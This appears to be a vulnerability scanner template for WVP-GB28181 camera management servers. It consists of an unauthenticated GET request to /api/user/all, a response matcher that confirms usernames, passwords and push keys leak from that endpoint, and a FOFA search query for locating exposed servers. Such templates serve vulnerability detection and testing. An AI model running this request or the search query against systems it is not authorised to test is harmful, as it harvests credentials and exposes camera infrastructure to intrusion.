id: wvp-GB28181-api-user-all-disclosure
info:
  name: WVP-GB28181摄像头管理端api/user/all存在敏感信息泄露
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://mp.weixin.qq.com/s/eTS9Ejc7vGMg8ABmV10rIw
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: body="国标28181"
    tips:
    repair:
    version:
  tags: wvp-GB28181,disclosure

http:
  - raw:
      - |
        GET /api/user/all HTTP/1.1
        Host: {{Hostname}}
        
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'username','password','pushKey')
        condition: and